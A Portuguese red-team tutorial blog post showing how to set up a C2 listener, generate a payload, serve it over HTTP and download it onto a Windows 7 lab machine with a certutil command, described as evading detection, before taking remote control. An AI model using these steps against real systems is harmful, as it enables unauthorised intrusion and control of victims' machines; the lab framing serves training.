Já sabemos o que é um servidor C2, ou Comando e Controle, e, se você não estiver familiarizado, dê uma olhada em nosso primeiro post desta série. No primeiro post desta série , explicamos como instalar e configurar um. Agora, é hora de testar sua funcionalidade e nos familiarizar com seu comportamento operacional. É importante observar que, neste ponto, ainda não estamos ofuscando nossas comunicações; ou seja, não estamos usando nenhum redirecionador entre o "Cliente e o Servidor". Dessa forma, o que você verá é uma conexão direta entre a vítima e nosso servidor C2. É crucial enfatizar isso porque, em uma operação no mundo real, a abordagem seria diferente.
Neste estágio, nosso servidor C2 está instalado e funcionando. Se você conhece nossa postagem anterior, deve se lembrar que a última captura de tela que compartilhamos está representada na imagem abaixo.
Neste ponto, vamos construir nosso primeiro Listener.
No contexto de um servidor de Comando e Controle (C2), um ouvinte é essencialmente um componente do lado do servidor projetado para aguardar conexões de entrada de clientes comprometidos, frequentemente chamados de "agentes" ou "bots". Um ouvinte opera em uma porta específica e pode usar um protocolo específico (HTTP, HTTPS, DNS, TCP, etc.) para estabelecer e manter a comunicação com o malware do lado do cliente que é executado nos sistemas-alvo.
Em seguida, vá até a aba "Exibir" e selecione "Ouvintes". No seu PC, você deverá ver algo parecido com isto:
Após selecionar "Ouvintes", uma janela aparecerá na tela enquanto este C2 oferece uma infinidade de opções de personalização. Para manter esta demonstração simples, usaremos as configurações padrões, conforme ilustrado na captura de tela abaixo:
Vá em frente e clique em salvar.
Após seguir os passos anteriores, você pode confirmar que o Listener está configurado e aguardando ativamente as conexões de entrada. Isso ficará evidente quando uma nova aba for aberta na parte inferior da interface do C2. Além disso, você verá uma notificação no canto superior direito, confirmando que o Listener foi iniciado. A notificação exibirá o nome que você atribuiu a ele, neste caso, "Demon". As duas imagens abaixo ilustram o que você deve ver na tela.
É hora de gerar nossa primeira carga útil.
No contexto de um servidor de Comando e Controle (C2), um "payload" refere-se ao código ou dados maliciosos enviados do servidor C2 para um sistema comprometido (o "cliente") ou do cliente de volta para o servidor C2. Os payloads podem servir a múltiplos propósitos, dependendo do objetivo do invasor, como executar comandos específicos, exfiltrar dados ou fornecer funcionalidade adicional ao malware já presente no sistema comprometido. Quando se trata da fase operacional de uma estrutura C2, a geração do payload é uma etapa crucial. Este é o componente que você precisará entregar ao sistema alvo por meio de algum meio, como phishing por e-mail, downloads drive-by ou outros vetores de ataque.
Após a execução do payload no sistema alvo, ele estabelece uma conexão de volta com o servidor C2, permitindo efetivamente que o invasor controle o sistema comprometido. Você pode personalizar os payloads para executar uma série de tarefas, incluindo, entre outras, keylogging, captura de dados de webcam e microfone, roubo de credenciais ou movimentação lateral dentro de uma rede. Algumas estruturas C2 avançadas permitem payloads "modulares", que podem baixar módulos funcionais adicionais do servidor C2 conforme necessário, tornando-os altamente flexíveis e extensíveis.
Vá em frente e clique na aba "Ataque" e depois selecione a opção "Carga Útil".
Uma janela semelhante à mostrada na imagem abaixo aparecerá na sua tela. Como você pode ver, ela oferece uma infinidade de opções de personalização para o seu payload. No entanto, para manter este post simples, usaremos as configurações padrão desta vez. Em posts futuros, abordaremos como personalizar seu payload usando técnicas avançadas, que também abordamos em detalhes em nosso curso "Infraestrutura para Hackers". Então, sem mais delongas, clique em "Gerar", usando o exemplo da imagem a seguir como guia.
Se tudo correr bem, você verá uma série de instruções aparecer na parte inferior da janela enquanto a carga útil é gerada. Veja a imagem abaixo:
Após a geração do payload, você pode navegar pelo diretório para localizar onde ele foi salvo. No meu caso, como você pode ver, está localizado na área de trabalho.
O comando python -m http.server inicia um servidor HTTP simples usando o módulo de servidor HTTP integrado do Python. Ao executar esse comando, o diretório atual onde o comando é executado se torna o diretório base do servidor, permitindo que os arquivos sejam servidos aos clientes que os solicitam via HTTP. O servidor escuta na porta 8000 por padrão, mas você pode especificar uma porta diferente anexando-a ao comando, por exemplo, python -m http.server 8080. Isso é frequentemente usado em configurações C2, testes de penetração e exercícios de red teaming para transferências de arquivos rápidas e fáceis, embora seja importante observar que ele não oferece nenhum mecanismo de criptografia ou autenticação pronto para uso.
Aqui está um rápido resumo do que acontece nos bastidores:
Inicialização : O módulo do servidor HTTP Python (http.server) é inicializado. Este é um servidor HTTP simples e integrado que vem com a biblioteca padrão do Python.
Criação e vinculação de soquete : um soquete é criado e vinculado ao host (geralmente localhost ou 0.0.0.0 para escutar em todas as interfaces de rede disponíveis) e à porta especificada (o padrão é 8000).
Escuta : O servidor começa a escutar as requisições HTTP recebidas. Quando uma requisição é recebida, ele lê os cabeçalhos HTTP para determinar qual arquivo ou caminho o cliente está solicitando.
Serviço de Arquivos : Procura o arquivo solicitado em seu diretório base (o diretório de onde você executou o comando). Se encontrar o arquivo, ele o serve de volta ao cliente. Caso contrário, envia um erro 404.
Registro : a maioria das interações é registrada no console, fornecendo informações sobre o IP do cliente, caminho solicitado e outros detalhes.
Em um contexto de operações cibernéticas, embora simples e rápida, essa abordagem deve ser usada com cautela. A falta de criptografia e autenticação pode representar um risco à segurança, tornando o servidor e os arquivos que ele serve vulneráveis a acessos não autorizados ou ataques do tipo "man-in-the-middle". Para implementações mais seguras, pode-se considerar o uso de soluções mais robustas, como um servidor Nginx ou Apache, potencialmente com criptografia SSL.
Agora, usaremos uma máquina virtual Windows 7 como nosso sistema operacional de destino, na qual abriremos nosso terminal de Prompt de Comando (cmd).
Nesta parte do guia, vamos nos concentrar em um utilitário interessante do Windows, o certutil, para buscar nosso payload no servidor de Comando e Controle (C2). No contexto de uma operação da Equipe Vermelha, baixar seu payload de forma segura e furtiva é crucial. Embora existam várias maneiras de fazer isso, o certutil pode ser útil, pois é um utilitário legítimo integrado ao Windows, usado principalmente para gerenciamento de certificados, mas também pode ser "usado indevidamente" para nossos propósitos.
Aqui está o comando detalhado:
certutil : Este é o utilitário do Windows que estamos usando.
-urlcache : Este sinalizador serve para informar ao certutil para armazenar em cache o objeto recuperado do URL.
-split : Este sinalizador especifica que o objeto deve ser dividido entre vários registros no cache. Isso não é particularmente necessário em nosso contexto, mas pode ser útil para arquivos grandes.
-f : Este sinalizador significa "forçar", garantindo que o download aconteça mesmo que o arquivo já exista.
http://192.168.1.88:8000/demon.exe : Esta é a URL do seu servidor C2 onde o demon.exe, seu payload, reside.
O comando completo, certutil -urlcache -split -f http://192.168.1.88:8000/demon.exe, baixará o demon.exe do seu servidor C2 e o armazenará localmente na máquina em que você está operando. Uma das vantagens de usar o certutil dessa maneira é que ele frequentemente ignora os métodos tradicionais de detecção devido ao seu status legítimo. No entanto, soluções de segurança mais recentes estão se aprimorando na detecção desse tipo de técnica de "viver da terra", portanto, sua eficácia pode variar.
Como você pode observar na captura de tela abaixo, a carga foi transferida com sucesso para a área de trabalho da máquina de destino.
Agora, vá em frente e clique duas vezes na carga útil na máquina de destino.
Instantaneamente, você observará que o painel direito da nossa interface C2 inicia a conexão, permitindo-nos controle total sobre nosso alvo.
Agora navegue até a aba "Visualização" e selecione a opção "Visualização Gráfica". Você poderá visualizar a interação entre o C2 e a máquina-alvo, conforme ilustrado na imagem abaixo.
Se você clicar com o botão direito do mouse na máquina de destino na visualização gráfica, você obterá não apenas acesso interativo, mas também a capacidade de visualizar listagens de processos e detalhes do explorador de arquivos, conforme mostrado nas imagens abaixo.
Se você clicar com o botão direito do mouse na representação gráfica da máquina de destino e escolher a opção "Interagir", poderá executar diversas ações no sistema de destino. Para isso, navegue até a parte inferior da aba recém-aberta, acionada pelo processo mencionado, digite "help" e pressione Enter.
Abaixo, você encontrará uma captura de tela que ilustra o que você deve estar vendo no seu computador neste momento. Ela fornece uma visão geral de algumas das ações que você pode executar na máquina de destino.
Vá em frente e digite o comando "checkin". Isso fornecerá informações completas sobre o sistema de destino, conforme ilustrado nas fotos abaixo.
Esta foi apenas uma pequena amostra dos recursos que você pode desbloquear com apenas alguns comandos. Imagine as infinitas possibilidades ao dominar sistemas abrangentes de implantação de infraestrutura, juntamente com cenários complexos. Para se aprofundar neste assunto, listei abaixo duas opções possíveis que você pode explorar.
Comentários
Postar um comentário